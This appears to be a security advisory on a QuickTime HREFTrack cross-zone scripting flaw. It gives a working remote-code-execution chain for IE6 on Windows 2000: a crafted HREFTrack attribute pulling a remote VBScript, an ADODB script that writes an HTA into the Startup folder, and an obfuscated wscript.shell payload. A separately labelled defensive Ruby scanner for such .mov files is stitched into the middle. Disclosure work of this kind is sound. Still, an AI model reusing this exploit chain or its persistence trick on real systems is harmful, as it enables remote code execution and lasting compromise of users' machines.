
Nick Nolte about Quicktime: 'Pimp pwnage.'

Artwork by GC.

Summary

A month ago, a vulnerability in QuickTime was exploited to spread a worm on MySpace. The vulnerability was first published by pdp. In his article, pdp describes how the HREFTrack attribute in .mov files can be used for malicious scripting. The MySpace worm abused this vulnerability as a cross-site scripting attack vector.

This MoAB issue shows that the same vulnerability can also be used for cross-zone scripting which, in combination with other vulnerabilities, allows remote execution of arbitrary code on the user's machine, as well as disclosure of the filesystem contents.

Affected versions

This issue has been successfully exploited in QuickTime™ Version 7.1.3. Previous versions are likely vulnerable as well.

Proof of concept, exploit or instructions to reproduce

Requires a working Ruby interpreter. If the 'serve' argument is passed, it launches both a web server (via WEBrick) and a non-standard (aka quick hack) FTP server. The exploit uses a Microsoft Text Driver ADODB connection which, for an unknown reason, requires an anonymous FTP login to the exploit location. The FTP hack hasn't been fully tested and thus has been removed from the public version. The script generates the files for the location of your choice:

$ ruby MOAB-03-01-2007.rb
++ Preparing files...
++ Script file....
++ HTA payload file....
-- Terminating: 761

Modify REMOTE_HOST, REMOTE_URL and HTA_PAYLOAD as necessary. Note that you still need to provide a MOV file with the crafted HREFTrack attribute. See notes below for information about how to do it.

Debugging information

Not necessary for this issue. See notes below and the proof of concept provided.

Notes

Exploitation conditions

We are using an already patched vulnerability on Windows 2000 SP4 to demonstrate one of the possible attack vectors to abuse this issue.

MS06-044 is a vulnerability in the Microsoft Management Console (MMC) which can easily be exploited for remote code execution in the Internet Zone of IE5 on Win2k SP4. However, according to Microsoft's security bulletin, it cannot be exploited in the Internet Zone of IE6 SP1 because "by default Internet Explorer 6 Service Pack 1 blocks local file access from URLs in the Internet Zone". We will use the QuickTime HREFTrack vulnerability to refute that claim.

HD Moore, who discovered the MMC vulnerability, published an exploit for IE5. His exploit uses the Execute function of the Shell.Application ActiveX object to run code; that control was disabled in IE6 SP1. Instead, we'll use an older code execution exploit provided by http-equiv and Michael Evanchik. It uses the Microsoft Text Driver to retrieve a script that is saved as an HTA file in the target user's startup folder and executed at the next login.

The problem with this exploit code is that it's too long for the HREFTrack attribute. Therefore, we'll use a new cross-zone vulnerability in IE: Internet Explorer 6.0 SP1 runs a remote script referenced from a Local Zone page in the Local Zone context. Although this might be considered a minor issue, it lets us keep only a short reference script in the HREFTrack attribute and pull the full exploit from a remote script file.

The HREFTrack attribute:

A<res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript src="http://remote/q.vbs"
language="vbscript"%3E%3C/script%3E%3C%21--//|> T<>
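The advisory tells you to supply a MOV carrying the crafted HREFTrack attribute but does not show what that looks like on disk. The following is an added example, not code from the advisory or from the MoAB PoC script: a minimal QuickTime atom walker in Ruby that finds the text track, reads its samples and flags HREFTrack URLs that reach into the Local Zone (res://, file://) or carry markup, together with the text sample encoder used to construct the test movie. Assumptions that are not from the page: one sample per chunk (the stsc table is ignored), 32-bit 'stco' offsets only, the track name stored in trak/udta/name, and the movie layout of build_test_mov, which is a constructed input rather than a real-world sample.

```ruby
# Added example (not from the MoAB advisory): scan a .mov for HREFTrack samples
# that point into the local zone or embed markup. Assumptions: one sample per
# chunk, 32-bit stco offsets, track name in trak/udta/name.

CONTAINER_ATOMS = %w[moov trak mdia minf stbl udta].freeze

# QuickTime text sample: 16-bit big-endian length followed by the text bytes.
def text_sample(text)
  [text.bytesize].pack('n') + text.b
end

# Wrap a payload in an atom: 32-bit big-endian size (header included) + 4-byte type.
def atom(type, payload)
  [payload.bytesize + 8].pack('N') + type.b + payload.b
end

# Walk the atoms in data[offset...limit], yielding [path, payload] for each one.
def walk_atoms(data, offset, limit, path = [], &blk)
  while offset + 8 <= limit
    size = data[offset, 4].unpack1('N')
    type = data[offset + 4, 4]
    hdr = 8
    if size == 1                                   # 64-bit extended size follows
      size = data[offset + 8, 8].unpack1('Q>')
      hdr = 16
    elsif size == 0                                # "extends to end of enclosing atom"
      break if path.last == 'udta'                 # ...except in udta, where 0 is a terminator
      size = limit - offset
    end
    break if size < hdr || offset + size > limit   # truncated or corrupt: stop, never over-read
    payload = data[offset + hdr, size - hdr]
    yield path + [type], payload
    walk_atoms(data, offset + hdr, offset + size, path + [type], &blk) if CONTAINER_ATOMS.include?(type)
    offset += size
  end
end

# Per-track metadata: user-data name, handler subtype, sample sizes, chunk offsets.
def tracks(mov)
  list = []
  walk_atoms(mov, 0, mov.bytesize) do |path, payload|
    list << { name: nil, subtype: nil, sizes: [], offsets: [] } if path.last == 'trak'
    trk = list.last
    next unless trk && path.include?('trak')
    case path.last
    when 'name' then trk[:name] = payload.unpack1('Z*') if path[-2] == 'udta'
    when 'hdlr' then trk[:subtype] = payload[8, 4]      # version/flags, type, subtype
    when 'stsz'
      fixed, n = payload[4, 8].unpack('NN')
      trk[:sizes] = fixed.zero? ? payload[12, 4 * n].unpack('N*') : Array.new(n, fixed)
    when 'stco'
      n = payload[4, 4].unpack1('N')
      trk[:offsets] = payload[8, 4 * n].unpack('N*')
    end
  end
  list
end

# Decoded text of every sample in every text track (or any track named HREFTrack).
def text_samples(mov)
  tracks(mov).select { |t| t[:subtype] == 'text' || t[:name] == 'HREFTrack' }.flat_map do |t|
    t[:offsets].zip(t[:sizes]).map do |off, _size|
      len = mov[off, 2].unpack1('n')
      mov[off + 2, len].force_encoding('UTF-8')
    end
  end
end

# HREFTrack syntax: optional "A" (load automatically) + "<url>", optional " T<target>".
HREF_RE = /\A\s*(A)?<(.*?)>(?:\s*T<(.*?)>)?\s*\z/m

def href_findings(mov)
  text_samples(mov).map do |s|
    next unless (m = HREF_RE.match(s))
    url = m[2]
    reasons = []
    reasons << 'auto-load' if m[1]
    reasons << 'local zone scheme' if url =~ %r{\A(res|file):}i
    reasons << 'markup in URL' if url =~ /<|%3C/i
    { url: url, target: m[3], auto: !m[1].nil?, reasons: reasons }
  end.compact
end

# The attribute from this advisory, collapsed onto one line.
PAGE_HREF = 'A<res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript src="http://remote/q.vbs" ' \
            'language="vbscript"%3E%3C/script%3E%3C%21--//|> T<>'

# Constructed test input: the smallest layout the walker above understands, one text sample.
def build_test_mov(href)
  sample = text_sample(href)
  ftyp = atom('ftyp', 'qt  ' + [0].pack('N') + 'qt  ')
  moov_for = lambda do |sample_offset|
    hdlr = atom('hdlr', [0].pack('N') + 'mhlr' + 'text' + "\0" * 13)
    stsz = atom('stsz', [0, 0, 1, sample.bytesize].pack('N4'))
    stco = atom('stco', [0, 1, sample_offset].pack('N3'))
    mdia = atom('mdia', hdlr + atom('minf', atom('stbl', stsz + stco)))
    atom('moov', atom('trak', atom('udta', atom('name', 'HREFTrack')) + mdia))
  end
  moov = moov_for.call(0)                      # moov size does not depend on the offset value
  ftyp + moov_for.call(ftyp.bytesize + moov.bytesize + 8) + atom('mdat', sample)
end

if __FILE__ == $PROGRAM_NAME
  mov = ARGV.empty? ? build_test_mov(PAGE_HREF) : File.binread(ARGV[0])
  href_findings(mov).each { |f| puts "#{f[:reasons].join(', ')}: #{f[:url][0, 60]}" }
end
```

Run it with a .mov path to scan a real file, or with no arguments to scan the constructed sample. Real movies usually need the stsc table to map samples to chunks; the one-sample-per-chunk shortcut here is enough for single-sample HREF tracks like the one used in this advisory, and the walker stops rather than over-reads on a truncated or corrupt atom size.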

The remote script (q.vbs):

' Runs in the Local Zone (referenced from the res:// page), so ADODB is not blocked.
on error resume next
' ADO constant; it is not predefined in browser-hosted VBScript, so it is declared here.
Const adPersistXML = 1
Set c = CreateObject("ADODB.Connection")
' The Text Driver fetches qtpoc.txt over HTTP from the exploit location.
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};Dbq=http://remote/;Extensions=txt;"
c.Open co
Set rs = CreateObject("ADODB.Recordset")
rs.Open "SELECT * from qtpoc.txt", c
' Persist the rows as XML into the All Users startup folder; the HTA runs at the next login.
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\poc.hta", adPersistXML
rs.Close
c.Close
window.close

The HTA payload (qtpoc.txt):

<!-- q is assembled across script blocks and decodes to "wscript.shell" -->
<script>q='%77%73%63%72%69%70';</script>
<script>q+='%74%2E%73%68%65%6C%6C';</script>
<script>a=new ActiveXObject(unescape(q));</script>
<script>a.run('%windir%\\System32\\calc.exe');</script>
<script>window.close();</script>

We have combined the following vulnerabilities in order to conduct remote code execution on Win2k SP4 with IE6 SP1:

1) HREFTrack cross-zone scripting vulnerability
   -> Refer to local resources from remote.
2) MS06-044 - Microsoft Management Console cross-site scripting vulnerability
   -> Inject script in local-zone.
3) IE6 SP1 cross-zone scripting vulnerability
   -> Load script from remote in local zone context.
4) ADODB.Recordset save adPersistXML vulnerability
   -> Save the HTA file on the startup folder of the victim.

Workaround or temporary solution

Apple has released a patch to address the MySpace worm. This patch is limited to Microsoft Internet Explorer users, and it was only published on MySpace.com (?) instead of as an official release on Apple.com. We have tested this patch on several machines, and it seems to have no effect at all: with the patch applied, we can still refer to local resources.

In addition, pdp has already published another vulnerability in QuickTime’s .QTL files which can be exploited in the same way as the HREFTrack vulnerability in order to conduct remote code execution.

Thus, until real patches are available, we recommend uninstalling Quicktime or simply live with the feeling of being a potential target for pwnage.